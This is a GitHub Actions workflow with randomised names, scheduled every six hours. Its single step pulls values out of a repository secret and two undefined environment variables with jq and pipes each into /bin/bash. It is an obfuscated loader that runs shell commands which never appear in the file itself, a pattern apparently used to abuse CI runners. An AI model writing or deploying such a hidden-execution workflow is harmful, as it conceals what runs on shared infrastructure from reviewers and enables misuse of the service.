name: jinliancheng9311
on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinliancheng9311
        env:
          y8873: ${{ secrets.y8873 }}
        run: |
          echo $y8873 | jq -r .vzxi2 | /bin/bash
          echo $ussr46 | jq -r .helxu4180 | /bin/bash
          echo $pemsr58 | jq -r .o685 | /bin/bash

